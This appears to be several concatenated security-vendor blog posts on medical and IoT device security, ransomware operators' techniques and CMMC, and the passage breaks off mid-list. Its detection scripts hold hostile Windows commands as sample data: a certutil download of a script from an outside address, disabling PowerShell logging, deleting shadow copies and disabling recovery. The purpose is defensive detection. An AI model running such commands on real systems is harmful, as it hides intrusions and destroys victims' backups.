In 2020 we have seen a massive rise in the number of internet-connected devices deployed to improve patient care, organizational efficiency, speed of crisis response, and much more during COVID-19. The emergence of telemedicine, digital health records, internet-connected medical devices, patient wellness apps, and a growing number of third parties entering the health supply chain has undoubtedly created benefits. It has also created a vast landscape for threat actors to exploit: devices that are unpatched, still use default passwords, are subject to FDA recalls, carry known CVEs, and have many more weaknesses besides.
This week, we will delve into IT, IoT, OT, and IoMT devices and the appropriate steps to building a true asset inventory, having a baseline of acceptable device behavior in order to spot anomalies or malicious behavior, and the ability to create automated actions based on this information.
Have a True Asset Inventory
Most organizations today struggle to have a real-time, accurate inventory of the devices on their network with the context needed to understand how to manage them.
Detect ALL connected devices, including unmanaged, IoT and IoMT devices on your network. This includes unknown and unauthorized devices missed by traditional asset inventory.
Have rich context on those devices: make, classification, location, application/port usage, weak ciphers and certificates, manufacturer and FDA recalls, devices banned under the National Defense Authorization Act, and devices holding regulated data such as PCI and PHI.
Continuously analyze every device in real time for the risk it poses to the organization.
Understand Device Behavior – The Good and Bad
Once a true and continuous asset inventory is established you have a clear picture of the devices, but how do you sift through them to understand which to remediate, which to take offline, and which to utilize more?
Identify anomalous and suspicious communications to unauthorized networks and malicious sites and monitor devices for risks such as vulnerabilities, active threats, anomalies, and other malicious activity.
Compare and contrast device utilization across different facilities to identify and improve operational efficiency, schedule upgrades/patches on light usage days/hours to minimize disruption of operation, and ultimately, identify underutilized high-capital equipment to increase the utilization.
Create Automated Actions Based on Rich Device Context
After establishing both a solid asset inventory and then understanding the behavior surrounding your devices, being able to use this information is critical.
Dynamically generate and automatically enforce segmentation policies to isolate high-risk and vulnerable devices and only allow “sanctioned communications”.
Integrate with your existing CMMS, CMDB, firewall, NAC, and SIEM to trigger workflows for enforcement of Zero Trust policies.
The Ordr Systems Control Engine (SCE) can enable visibility and security of all your connected medical devices. It can discover every connected device, profile device behaviors and risks, and automate action for all medical and IoT assets in your healthcare organization.
Recently, we began an IoT Discovery Program that allows organizations to:
Gain high-fidelity visibility into devices that you may not know are on your network
Understand risks including communication patterns and vulnerabilities
Discover usage patterns for your devices
Map these devices to your Layer 2 and Layer 3 architecture
Identify appropriate segmentation policies to secure your devices
Medical devices are difficult to secure on a technical level. They are expensive and their operating systems typically stay the same for the device's entire service life. These devices are not easily managed remotely, may not support encryption, and often still carry default user passwords.
IoMT Security Components
To develop a thorough security program you should plan it in three stages:
Manage continuing vulnerability reporting and remediation programs
When trying to secure your medical devices you should be looking at all of the risk areas. Security vulnerabilities pose a threat to patient safety, medical device availability, and could result in financial loss or unauthorized access to information.
How to Analyze Risk
Risk analysis should follow these steps:
System characterization: Gather data on hardware & software
Threat identification: Look at the full spectrum of possible threats
Vulnerability analysis: Ask how do vulnerabilities impact devices and protocols
Controls analysis: Look at controls already in place and what is needed
Likelihood determination: Ask what are the chances of a device being compromised
Impact analysis: Ask how a compromised asset would affect the organization
Risk determination: Ask what risk level a device should be placed in
Controls recommendation: Determine what controls assets need to mitigate vulnerabilities
Results documentation: Share information and communicate with stakeholders
Risk Criteria & Categorization
When determining device risk level it is important to consider the likelihood of threat occurrence as well as the potential impact of threat occurrence on patients, business, and data.
Risk categorization aids in risk prioritization and remediation. You can categorize risks through device threat modeling: collecting device data, establishing a hypothesis, threat hunting, threat detection, and threat response.
It takes a team to create and manage a medical device security program. Setting a purpose and objective for this committee is key. The Responsible Accountable Consulted Informed (RACI) Matrix can help organize stakeholders and ensure everyone is aware of their role and responsibilities.
How Ordr Can Help
Developing a medical device security program can be a difficult and lengthy process. Ordr can help.
The Ordr System Control Engine (SCE) gives organizations the power to enable visibility and security of their network-connected devices, with a simple and powerful solution to identify, classify, profile the behavior and risk and automate action for every network-connected device in the enterprise. Want to experience Ordr on your network? Request a free sensor.
The biggest medical device security risk organizations face is the possibility of a widespread attack or multiple security threats happening at once. This can cause widespread unavailability of devices needed to treat patients. The integrity of devices is also important to consider, without proper device management and supervision, malware can remain undetected.
Medical devices should be assessed at point of purchase. Before putting a device on a network it should be checked for basic passwords and other vulnerabilities. Organizations should also know all devices that are on the clinical network, and track what those devices are doing. Clinical Engineering (CE) and Information Technology (IT) teams should work together to leverage their training and awareness of device security risks.
Typically there are safety specialists who focus on technical controls and separate specialists who work on risk management, but these tasks should be joined into one security plan so that medical devices are controlled and monitored for risks.
Difficulties Developing a Medical Device Security Program
Developing a medical device security program can be difficult for a multitude of reasons:
Business: Lack of adequate funding, staffing and training issues, as well as organizational structure, impede the creation of a joint CE and IT security program.
Policy and Procedure: Organizations’ IT policies and procedures rarely include medical device security, and have disjointed governance and sponsorship policies.
Technical: Typical IT network tools do not work for medical device security purposes, and unless medical devices are passively scanned as part of the IT network they often get overlooked. Use of legacy devices also causes technical issues, as devices go unpatched for long periods of time.
Vendors: Medical device vendors utilize different remote access controls that may or may not be able to show who/what causes devices to crash.
Physical Security: Physical guest access to devices and the potential for organization IDs to be used to gain access to devices puts them at risk.
Addressing the Stakeholders
Involve all parties in the creation of a medical device security plan. Make clinical staff aware of the integrity of medical devices such as ultrasounds and anesthesia machines. Also include CISOs, IT teams, Healthcare Technology Management (HTM) teams and vendors. Discuss with all those involved the objectives of creating a medical device security plan and set up a timeline, as creating and rolling out a security plan can take many months.
How Ordr Can Help
Creating a device security program is challenging on its own, and would be even more difficult without a product to help passively scan for devices and identify risks.
Look for a blog post covering Part 3 of the Medical Device Security webinar series in the future. You can watch the full HIMSS webinar here.
Tactics, Techniques, Procedures and Recommendations of How to Triage
Perspective on the increase in ransomware attacks
Ransomware continues to make the headlines as researchers warn of a seven-fold increase compared to 2019. Healthcare is a very lucrative target, with attacks increasing by 350% in Q4 of 2019 (compared to Q4 2018) and continuing to rise through 2020. The pandemic provided a significant opportunity for any threat actor looking to target healthcare providers, as the focus narrowed from a holistic view of patient care, health outcomes, experience, revenue, and security to health outcomes alone. In addition, there has been a mass influx of connected devices deployed in facilities without the proper purview of IT and Security teams, leading to incomplete asset inventories and no clear visibility of how and where devices are communicating.
Ransomware as a viable threat to healthcare organizations has led to sophisticated attackers running complex and targeted campaigns. The recent wave of ransomware campaigns looks more like a hands-on intrusion than an autonomous piece of malware propagating across the network. The operators behind these attacks are heavily incentivized to make sure their malware propagates effectively across diverse networks. We have seen simple pieces of malware like trojan droppers install remote-control functionality and backdoors, which allow the ransomware operators to get onto the healthcare network and then run tools like Cobalt Strike to escalate their privileges to administrator. Once they hold administrator privileges, these operators begin turning off the malware detection and incident response tooling on the infected devices. We have seen them use tools like Mimikatz to dump memory and gather local administrator passwords or common user passwords from systems. Once common passwords have been gathered, the network is theirs for the taking. In organizations that use Remote Desktop Protocol (RDP) on workstations and servers, we have seen these compromised local administrator accounts used to install and distribute the ransomware. We have also seen these attackers run PsExec and PowerShell scripts remotely by mounting administrative shares (like IPC$ and C$) with the compromised credentials. If local or commonly used credentials cannot be gathered from the initially infected host, we have seen them pivot to other hosts or use common exploit kits to propagate through the network. These operators are skilled and, unfortunately, most healthcare providers and healthcare delivery organizations are trivial to compromise once the ransomware operators are inside.
Healthcare organizations that expose vulnerable services at the edge of their network are compromised easily by autonomous scripts that constantly scan the internet. Once a host is compromised, the script drops a payload that includes all of the tools the operators need for privilege escalation, exploitation, and lateral movement. Many healthcare organizations have flat networks and use shared local administrator accounts on largely unpatched systems. It is common to find legacy, unsupported operating systems like Windows XP running on both workstations and critical medical devices that cannot be patched and that expose vulnerable services like SMBv1 to the entire network. Simply put, once the initial compromise happens, it is largely trivial for these ransomware operators to infect an entire healthcare organization within a few hours.
Let’s discuss the 3 most common ransomware campaigns that are targeting healthcare providers and healthcare delivery organizations and what their TTPs are:
The Zeppelin ransomware is believed to be operated by a Russian cybercrime group, though very little is known about the operators. The initial infection code checks that it will not infect machines located in Belarus, Kazakhstan, the Russian Federation, or Ukraine. The Zeppelin code is largely based on a purchasable ransomware variant known as VegaLocker, which is available on multiple hacking and ransomware-as-a-service websites and forums. The first Zeppelin infections were seen at the beginning of 2019.
What does a Zeppelin Compromise typically look like (TTPs):
Typically, a spam or phishing email is received by an organization that includes a malicious document which downloads and installs malware onto the system.
Some initial infections appear to be Vidar spyware or the Cobalt Strike penetration-testing toolkit.
Recently the Zeppelin operators appear to be exploiting vulnerable RDP, Apache Tomcat, and Oracle WebLogic servers exposed to the internet.
Once connected to the infected system the operators will install PowerShell scripts and PsExec.
In some Zeppelin instances a legitimate remote desktop application called ScreenConnect is initially installed (if it doesn’t already exist). The Zeppelin operators will connect to the ScreenConnect service and install the PowerShell scripts, privilege escalation tools, and PsExec.
The Zeppelin operators will run a set of PowerShell Anti-Anti-Virus scripts and turn off logging to prevent detection and subsequently dump memory looking for local accounts that can be used to either propagate throughout the network or compromise the domain controller.
Typically, the Zeppelin operators attempt to compromise the domain controller and, once it is compromised, create a domain admin account to distribute the Zeppelin ransomware throughout the network.
The domain admin account that is typically created is called “SQLSvc”.
If the domain controller is difficult to compromise, they attempt to distribute the Zeppelin ransomware using compromised credentials dumped from memory of infected systems and propagate through file deployment and execution by PsExec.
Once on the Domain Controller, they deploy a command to all connected devices to download Anti-Anti-Virus and Anti-Backup scripts along with the Zeppelin ransomware.
The Zeppelin operators utilize the certutil command on Windows to download and infect machines with the scripts and ransomware.
Finally, the scripts and the Zeppelin ransomware are executed on all connected devices via PsExec.
The Ryuk ransomware, later succeeded by Conti, is known to be operated by a Russian cybercrime group. Ryuk was largely based on a previous ransomware codebase known as Hermes, which was possibly created by a North Korean hacking group and is purchasable from multiple hacking and ransomware-as-a-service websites and forums. The group started targeting healthcare organizations in late 2018.
What does a Ryuk Compromise typically look like (TTPs):
A spam or phishing email is received by an organization that includes an infected document that drops a trojan downloader/bot that includes several tools for remote access, privilege escalation, and lateral movement.
Many believe that the Ryuk operators are working with the Emotet and TrickBot deployers in order to purchase previously infected systems within large networks.
The Ryuk operators gain access to the Emotet/TrickBot compromised machine typically through a PowerShell script that launches a reverse shell that connects to the Ryuk operators.
Once on the infected system the Ryuk operators turn off all PowerShell logging and run Anti-Anti-Virus scripts to prevent detection.
Common lateral movement, privilege escalation, and exploit kits are downloaded onto the infected machine.
It is common for the Ryuk operators to utilize the PowerShell Empire post exploitation kit.
The Ryuk operators dump the infected machine's memory looking for local accounts that are used on workstations and servers throughout the network.
If local credentials are not found, the operators will use common exploit kits.
Lateral movement and infection happen either via RDP or through PsExec.
Typically, the domain controller is initially targeted and if compromised the domain controllers will typically be used to distribute the scripts and Ryuk ransomware to all connected users/computers.
Anti-Anti-Virus and Anti-Backup/Recovery scripts are run on soon to be infected machines in order to prevent both detection and recovery from the Ryuk ransomware.
The Ryuk ransomware is deployed to all machines using PsExec and a local service is created and started to run the Ryuk binary.
The Ryuk operators sometimes oversee the infection to ensure that it is successful and once infected they start emailing employees informing them of the infection and to reach out to them via an anonymous email where payments are later discussed. The payment amounts typically vary depending on the size and the revenue of the organization that is infected.
Sodinokibi (aka Sodin, REvil) is another ransomware-as-a-service operation which started in April 2019 and is believed to have been created and operated by the same Russian group behind the popular GandCrab ransomware. In early 2019 the Sodinokibi group is believed to have recruited affiliate hackers with a guaranteed payment of USD 50,000 and a 60% to 70% cut of the revenue once payments were secured from victims. The developers regularly post updates and new functionality to their code. Once installed, Sodinokibi checks the computer's language settings and will not infect the machine if the configured language is one used in most former Soviet Union or Middle Eastern countries. Sodinokibi has been seen using several TTPs, including manual and automated drive-by compromises, spam/phishing attacks, common exploits, and previously compromised passwords.
What does a Sodinokibi Compromise typically look like (TTPs):
It is difficult to describe the typical attack method used to deploy the Sodinokibi ransomware as there are several which leads some security professionals to believe that Sodinokibi is being operated by multiple cybercrime organizations.
The Sodinokibi operators also appear to be exploiting vulnerable WebLogic and RDP servers available on the internet.
After the initial infection the Sodinokibi operators drop various exploit and privilege escalations kits to laterally move throughout the network.
Similar to Zeppelin the Sodinokibi operators typically use the certutil command on Windows to download their scripts, exploit kits, and ransomware payload to infected machines.
Once it executes, the Sodinokibi binary deletes all volume shadow copies on the infected system and disables Windows recovery so that the encrypted files cannot be restored from a local backup.
The Sodinokibi ransomware includes several persistence and Anti-Anti-Virus and Anti-Backup/Restore functionality making the installation easy. This functionality makes it more autonomous for the operators which is why we sometimes see Sodinokibi installed in simple drive by attacks on vulnerable internet facing servers and services.
One concerning tactic that most ransomware as a service operators are starting to employ is to exfiltrate several important files from an infected organization and threaten to both publicly disclose the breach and publish the important documents on their blogs typically hosted on the Dark Web. We’ve seen many ransomware operators publicly announce and release sensitive material for companies that did not pay the ransom.
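Several of the operator behaviours listed for all three campaigns leave host-side evidence that can be triaged mechanically: certutil used as a downloader, PowerShell script block logging being switched off, shadow copies and Windows recovery being removed, the PsExec service appearing on a machine, and a newly created account being added to Domain Admins (the SQLSvc pattern). The following is an added example, not Ordr code or a product feature: a small rule set run over Windows event records. The records are constructed for this illustration; their field names follow Sysmon and Windows Security/System log conventions but were hand-written, not captured from an incident. Event IDs used: Sysmon 1 (process creation), Security 4720 (account created) and 4728 (member added to a security-enabled global group), System 7045 (service installed).

```python
"""Triage Windows event records for the ransomware operator TTPs described above.

Added example, not Ordr code. The events are constructed for illustration; field
names follow Sysmon and Windows Security/System log conventions but were
hand-written, not captured from an incident.
"""
import re
from collections import defaultdict

# Event IDs used: Sysmon 1 = process creation; Security 4720 = account created,
# 4728 = member added to a security-enabled global group; System 7045 = service installed.
SAMPLE_EVENTS = [
    {"ts": "2020-10-01T02:11:05Z", "host": "WS-RAD-07", "log": "Sysmon", "event_id": 1,
     "cmdline": r"certutil -urlcache -split -f http://203.0.113.20/aav.ps1 C:\Users\Public\aav.ps1"},
    {"ts": "2020-10-01T02:11:40Z", "host": "WS-RAD-07", "log": "Sysmon", "event_id": 1,
     "cmdline": r"powershell -ep bypass Set-ItemProperty HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging EnableScriptBlockLogging 0"},
    {"ts": "2020-10-01T02:30:12Z", "host": "DC01", "log": "Security", "event_id": 4720,
     "target_user": "SQLSvc", "subject_user": "jdoe-adm"},
    {"ts": "2020-10-01T02:30:15Z", "host": "DC01", "log": "Security", "event_id": 4728,
     "target_user": "SQLSvc", "group": "Domain Admins"},
    {"ts": "2020-10-01T03:05:02Z", "host": "SRV-PACS-02", "log": "System", "event_id": 7045,
     "service_name": "PSEXESVC", "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    {"ts": "2020-10-01T03:05:30Z", "host": "SRV-PACS-02", "log": "Sysmon", "event_id": 1,
     "cmdline": "vssadmin delete shadows /all /quiet"},
    {"ts": "2020-10-01T03:05:31Z", "host": "SRV-PACS-02", "log": "Sysmon", "event_id": 1,
     "cmdline": "bcdedit /set {default} recoveryenabled No"},
    # Benign noise that must not fire: an administrator listing shadow copies.
    {"ts": "2020-10-01T03:10:00Z", "host": "SRV-FILE-01", "log": "Sysmon", "event_id": 1,
     "cmdline": "vssadmin list shadows"},
]


def _cmd(event):
    """Lower-cased command line for process-creation events, '' otherwise."""
    if event.get("log") == "Sysmon" and event.get("event_id") == 1:
        return event.get("cmdline", "").lower()
    return ""


# (indicator name, predicate). Each maps to a TTP in the campaign descriptions above.
RULES = [
    ("certutil used as downloader",
     lambda e: "certutil" in _cmd(e) and "-urlcache" in _cmd(e) and "http" in _cmd(e)),
    ("PowerShell script block logging disabled",
     lambda e: re.search(r"enablescriptblocklogging\W+0\b", _cmd(e)) is not None),
    ("shadow copies deleted",
     lambda e: "vssadmin" in _cmd(e) and "delete shadows" in _cmd(e)),
    ("Windows recovery disabled",
     lambda e: "bcdedit" in _cmd(e) and "recoveryenabled no" in _cmd(e)),
    ("PsExec service installed",
     lambda e: e.get("event_id") == 7045
     and "psexesvc" in (e.get("service_name", "") + e.get("image_path", "")).lower()),
    ("account added to Domain Admins",
     lambda e: e.get("event_id") == 4728 and e.get("group", "").lower() == "domain admins"),
]


def match_rules(events):
    """One finding per (event, rule) hit."""
    return [{"ts": e["ts"], "host": e["host"], "rule": name}
            for e in events for name, pred in RULES if pred(e)]


def new_domain_admins(events):
    """Accounts created (4720) on a host and then added to Domain Admins (4728)
    on the same host: the SQLSvc pattern, generalised to any account name."""
    created = {(e["host"], e["target_user"]) for e in events if e.get("event_id") == 4720}
    return sorted({e["target_user"] for e in events
                   if e.get("event_id") == 4728 and e.get("group", "").lower() == "domain admins"
                   and (e["host"], e["target_user"]) in created})


def triage_order(findings):
    """Hosts ordered by the number of distinct indicators seen, most first."""
    per_host = defaultdict(set)
    for f in findings:
        per_host[f["host"]].add(f["rule"])
    return sorted(per_host, key=lambda h: (-len(per_host[h]), h))


if __name__ == "__main__":
    hits = match_rules(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h['ts']} {h['host']}: {h['rule']}")
    print("new domain admins:", new_domain_admins(SAMPLE_EVENTS))
    print("triage order:", triage_order(hits))
```

The per-host ordering puts the machine showing the most distinct operator behaviours first, which is usually the host being used as the distribution point rather than the initial foothold. The account correlation does not key on the name SQLSvc: any account created and promoted within the same log set is reported, so the check survives the operators changing the name.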
Recommendations on using Ordr to Protect Against Ransomware
Discover and identify your weak points
Identify devices running legacy versions of Windows with SMBv1 enabled (such as Windows XP and Windows 7). The Ordr IoT Discovery Program allows you to quickly identify these devices. In Ordr's Rise of The Machines Report, we identified that 15-19 percent of our deployments had IoT devices running on legacy operating systems (Windows 7 or older).
Identify devices with known vulnerabilities, as attackers will try to exploit them. Use Ordr's built-in scanner or take advantage of our integration with vulnerability management solutions like Rapid7 and Tenable.
Identify high-risk and vulnerable devices that cannot be patched. Using Ordr's WinRM integration, you can identify device operating systems and patch status.
Enable proactive segmentation
Systems that cannot be patched need to be isolated. Ordr allows you to easily create segmentation policies that restrict devices to only the sanctioned communications required for their functions.
Work with Ordr and our firewall and networking infrastructure partners to enforce these segmentation policies in your existing infrastructure.
Monitor for Ransomware Indicators
Identify anomalous communication using the Ordr Flow Genome. This can include discovery of sequential scans on the internal network, and anomalous SMB, RDP, and RPC communications utilized in lateral movement.
Alert on exploits commonly used in lateral movement, such as EternalBlue, and on known ransomware payload URLs.
Alert on common C2 communications to known ransomware payload servers; when infected machines reach out to these malicious sites, the Ordr product will alert on them.
Track user logon/logoff activities using Ordr. Our platform provides a mechanism to pull user logon and logoff activities from Active Directory and also track locally created users. This allows you to ensure the right users have access to vulnerable machines and to identify any anomalous user accounts created within the network by threat actors.
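The behavioural baselining described earlier (identifying anomalous communications to unauthorized networks) and the ransomware indicators listed here (sequential internal scans, anomalous SMB/RDP/RPC sessions) reduce to the same mechanism, shown below as an added example that is not the Ordr Flow Genome or any Ordr code. It learns each device's sanctioned (destination, protocol, port) set from a learning window of flow records, renders that set as the allowlist a segmentation policy would enforce, then flags flows to unsanctioned external destinations, SMB/RDP/RPC sessions to internal peers outside the baseline, and sequential scans (one source sweeping a contiguous run of internal addresses on one port within a short window). The flow records, the device roles and the 10.20.0.0/16 internal range are constructed for the illustration; the CSV layout is a minimal stand-in for a NetFlow/IPFIX export.

```python
"""Baseline device communications from flow records and flag ransomware
lateral-movement indicators.

Added example, not Ordr code. Flow records and the internal address range are
constructed for illustration; the CSV layout stands in for a NetFlow/IPFIX export.
"""
from collections import defaultdict
from datetime import datetime, timezone
import ipaddress

# Assumed organisational address space; anything outside it is treated as external.
INTERNAL_NETS = [ipaddress.ip_network("10.20.0.0/16")]
LATERAL_PORTS = {135: "RPC", 445: "SMB", 3389: "RDP"}

# Constructed learning window: a modality workstation (10.20.5.11) sending DICOM
# to PACS plus DNS/NTP, and a nurse-station PC (10.20.5.40) using a file share.
LEARNING_FLOWS = """
2020-09-30T08:00:00Z,10.20.5.11,10.20.9.4,tcp,104
2020-09-30T08:00:05Z,10.20.5.11,10.20.1.2,udp,53
2020-09-30T08:01:00Z,10.20.5.11,10.20.1.2,udp,123
2020-09-30T09:15:00Z,10.20.5.40,10.20.9.10,tcp,445
2020-09-30T09:15:03Z,10.20.5.40,10.20.1.2,udp,53
""".splitlines()

# Constructed detection window: the workstation keeps its sanctioned DICOM flow,
# then reaches an outside host and sweeps eight consecutive neighbours over SMB.
DETECTION_FLOWS = [
    "2020-10-01T02:00:00Z,10.20.5.11,10.20.9.4,tcp,104",
    "2020-10-01T02:12:00Z,10.20.5.11,203.0.113.20,tcp,443",
    "2020-10-01T02:25:00Z,10.20.5.40,10.20.9.10,tcp,445",
] + [f"2020-10-01T02:20:0{i}Z,10.20.5.11,10.20.5.{30 + i},tcp,445" for i in range(8)]


def parse_flows(lines):
    """Parse 'ts,src,dst,proto,dport' lines; blank lines and '#' comments are skipped."""
    flows = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, proto, dport = line.split(",")
        flows.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
                      "src": src, "dst": dst, "proto": proto, "dport": int(dport)})
    return flows


def build_baseline(flows):
    """Per source device, the set of (dst, proto, dport) seen during learning."""
    baseline = defaultdict(set)
    for f in flows:
        baseline[f["src"]].add((f["dst"], f["proto"], f["dport"]))
    return baseline


def sanctioned_policy(baseline, device):
    """Render a device's baseline as allowlist rules (its sanctioned communications)."""
    return [f"permit {device} -> {dst} {proto}/{port}" for dst, proto, port in sorted(baseline[device])]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def detect(flows, baseline, scan_min_hosts=6, scan_window_s=30):
    """Return (src, indicator, detail) alerts for out-of-baseline flows and scans."""
    alerts = []
    by_src_port = defaultdict(list)
    for f in flows:
        by_src_port[(f["src"], f["dport"])].append(f)
        if (f["dst"], f["proto"], f["dport"]) in baseline.get(f["src"], set()):
            continue  # sanctioned
        if not is_internal(f["dst"]):
            alerts.append((f["src"], "unsanctioned external destination", f"{f['dst']}:{f['dport']}"))
        elif f["dport"] in LATERAL_PORTS:
            alerts.append((f["src"], f"{LATERAL_PORTS[f['dport']]} to new internal peer", f["dst"]))
        else:
            alerts.append((f["src"], "out-of-baseline flow", f"{f['dst']}:{f['dport']}"))
    # Sequential scan: one source, one port, at least scan_min_hosts distinct
    # destinations forming a contiguous address run inside scan_window_s seconds.
    for (src, dport), fl in by_src_port.items():
        fl.sort(key=lambda f: f["ts"])
        for i, first in enumerate(fl):
            window = [g for g in fl[i:] if (g["ts"] - first["ts"]).total_seconds() <= scan_window_s]
            hosts = sorted({int(ipaddress.ip_address(g["dst"])) for g in window})
            if len(hosts) >= scan_min_hosts and hosts[-1] - hosts[0] + 1 == len(hosts):
                alerts.append((src, "sequential scan", f"{len(hosts)} consecutive hosts on port {dport}"))
                break
    return alerts


def summarize(alerts):
    """Count alerts per (source device, indicator)."""
    counts = defaultdict(int)
    for src, kind, _ in alerts:
        counts[(src, kind)] += 1
    return dict(counts)


if __name__ == "__main__":
    base = build_baseline(parse_flows(LEARNING_FLOWS))
    for rule in sanctioned_policy(base, "10.20.5.11"):
        print(rule)
    for src, kind, detail in detect(parse_flows(DETECTION_FLOWS), base):
        print(f"ALERT {src}: {kind} ({detail})")
```

On the constructed data the nurse-station PC produces no alerts because its file-share traffic was learned during the baseline, while the workstation produces one alert for the external connection, one per new SMB peer, and one scan alert; in practice the learning window should be long enough to cover scheduled activity such as overnight backups, or those legitimate flows show up as indicators too.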
If you’ve already been attacked by ransomware, here are recommendations on how to deal with it, as described previously in my blog here. Note that with ransomware examples in this blog, there are no decryptors available at this time.
If you have questions about ransomware protection, please contact us at email@example.com. We work with a number of excellent integrators and managed security providers who specialize in protecting healthcare and other industries that are heavily invested in the use of connected devices.
Medical devices have important functions and carry sensitive data, making them attractive cyber attack targets. As medical devices become increasingly connected to the internet they are becoming greater security risks. These devices are purchased and utilized by different departments within the organization and can lead to inaccurate asset inventories and unmanaged devices.
Attacks on medical devices can disrupt patient care and possibly result in patient harm. Not only will this lower the quality of care for that patient, it will also affect the organization's reputation and bottom line.
IoT & IoMT Device Security Challenges
There are a variety of security challenges that come with securing medical devices, and each requires a different solution.
Culture: There’s a disconnect between IT and Clinical Engineering teams. Each group has minimal experience and knowledge of the other’s work and capabilities.
Legacy Systems: Many medical devices on networks today are running on outdated operating systems and are kept for long periods of time.
Unable to Update: Medical devices are often difficult, if not impossible, to patch.
Medical Device Ecosystem is Complex: The medical device ecosystem is very complex, with devices coming from multiple vendors and software platforms.
Lack of Applicable Security Controls: Many familiar IT security controls don't apply to medical devices. Administrative and physical controls can be disruptive to patient care and operations.
Lack of Tools: IT teams have limited tools that work well with medical devices and can scan inventories for vulnerabilities.
Medical Devices are Proprietary: Medical devices are specialized; with different wireless requirements, hardware and software.
Insufficient Visibility: Many medical device networks lack adequate visibility of their medical device inventory.
Medical device security should be comprehensive; building the security program in three stages ensures it remains implementable down the line.
Risk Assessment: The first step in creating a program is assessing your current security practices. This includes reviewing the current security program practices, installing a passive network scanner, and creating a security risk classification guide. Organizations should also segment devices and decide what teams, whether it be IT or Clinical Engineering, will be remediating vulnerabilities and overseeing different devices.
Program Development: Next, create a cybersecurity program through adding security practices to pre-existing device management practices. This includes continued surveillance over remediated devices and other assets, as well as standardized device assessment, configuration and incident procedures.
Program Management: Sustained device management is necessary for medical organizations to stay secure. Assisting in medical device procurement and deployment, vulnerability reporting, and remediation planning should all be performed as part of program management.
How Ordr Can Help
Cynergistek highlighted a passive device scanner as a key tool to creating and automating a medical device security program. Ordr Systems Control Engine (SCE) is able to provide an accurate asset inventory, properly classify devices with granular detail needed for appropriate workflows, baseline and map device communications and enable micro-segmentation efforts.
The Ordr SCE gives organizations the power to enable visibility and security of their network-connected devices, with a simple and powerful solution to identify, classify, profile the behavior and risk and automate action for every network-connected device in the enterprise. To learn more about how Ordr can enable an effective IoT security strategy for your organization, request a free sensor.
Look for blog posts covering Part 2 and 3 of the Medical Device Security webinar series in the future. You can watch the full HIMSS webinar here.
Recently Ordr spent time talking to our clients about the Cybersecurity Maturity Model Certification (CMMC): what it is, why it's important, and how they can prepare for it as it relates to the world of devices and IoT. Ordr is the leader in IoT cybersecurity, serving organizations ranging from mid-market businesses to large enterprises, many of whom offer services to the Department of Defense (DoD). Because of this, it is incumbent on us to know how the CMMC will apply to our clients' infrastructure and to be able to help our clients achieve certification. We realize, and educate our clients, that the DoD's new CMMC isn't just another framework.
To help our forward-looking clients meet future CMMC requirements, Ordr is already working to map the security controls that IoT and device components require against the CMMC checklist. In order to plan for the CMMC, it is crucial that our clients and potential clients understand how IoT and device configurations are being considered as part of this new maturity model.
First let’s break down what CMMC is. In the Fall of 2020, the US Government will begin requiring organizations to become compliant with CMMC. This is being done primarily to help more organizations fix low rates of compliance associated with NIST 800-171. CMMC will become a requirement designed to permit only businesses with a valid CMMC certification to bid on and win contracts with the US Government. The US Department of Defense (DoD) obviously recognizes that all contractors are not alike, and is using the modifications of the CMMC and its “levels” to make this compliance endeavor more palatable for a broader swath of potential contracting organizations. The CMMC is a tiered model that has the potential to impact every business in the Defense Industrial Base (DIB). To be sure, this is no “small” endeavor.
Soon, contractors in the DoD supply chain will need to be evaluated against this maturity model by a third-party auditor. CMMC contains seventeen capability domains, each of which covers a different area of security. Each domain is evaluated on a level from one to five (five being the most mature), and the organization is assigned an overall CMMC level based on its evaluation results.
CMMC is a big deal for DIB companies because the level that an organization achieves will determine which DoD contracts they’re eligible to bid on and win. Get a 5, the world is your oyster; get a 1 and it limits your available opportunities.
For sure, CMMC is daunting. The capability domains outlined in CMMC are very broad, and entail everything from physical security to personnel security to asset management and essentially any other applicable security control the government can think of. That sounds nearly impossible, and it certainly could be, but in reality CMMC exists to help organizations understand the complexity and breadth of achieving a true security posture. Hopefully CMMC will help mitigate some of the pencil-whipping and box-checking security failures that have plagued contractors in the past.
Because CMMC is broad, it is critical that any organization wanting to compete and win lucrative contracts heed the call to ensure they consider their IoT/OT security vulnerabilities, as well as their other security controls and programs. Modern exploits and attacks usually cross IT/OT infrastructures at some point. After all, everything is “connected” today. This means that without IoT visibility and accountability the entire network is potentially threatened, and the CMMC auditors know that.
There are very few CMMC domains that don’t apply to IoT network devices. Asset discovery, threat detection, incident response are part of any intelligent or complete response package. One can easily see why they are integral to the CMMC requirements.
While CMMC has many other requirements, much of what it mandates can be summed up pretty simply. Here are a few basic considerations that can help set your organization on the right track to achieving CMMC compliance specifically related to your IoT/OT network devices.
1) Do you have visibility, access, analytics or even the capability to understand IoT devices?
You cannot defend what you cannot see, and you cannot defend any enterprise if you don't know the totality of devices or “assets” in a network. Ordr works with organizations to gain that visibility into their IT and IoT networks. In doing this our systems help your team understand how those assets communicate and are connected to each other.
Without that insight and knowledge, it’s impossible to prioritize risks, detect active threats already operating in your environment, or prove that your security posture is strong enough and doing its job. All of those things are key to CMMC compliance across a variety of domains. Being candid, it is impossible to fully secure your networks without having IoT/OT network device visibility.
2) How resilient is your overall IoT/IT network architecture?
CMMC focuses on building a stronger cybersecurity posture in DoD supply chain contractors, and as part of that, CMMC requires an organization to detail how they have built a strong overall approach for securing all network connected devices.
Part of having a sound security posture is to make sure that all devices only communicate with the internet as intended. Stronger network segmentation improves security. Ordr makes network segmentation easy by using ML/AI-assisted automation.
3) Can you identify and remediate IoT/OT device vulnerabilities in your network?
Key CMMC requirements focus on identifying and addressing vulnerabilities across all devices and infrastructure components. For networks with IoT/OT devices, that could mean CVEs, malfunctioning devices, or the presence of unauthorized ports or rogue applications. CMMC requires that you’re able to detect and prioritize vulnerabilities like this. If your organization cannot do this, you will have a hard time achieving higher levels of compliance. Ordr shines in this area and can rapidly enable this action.
4) Can you detect exploits with all your IoT/OT devices?
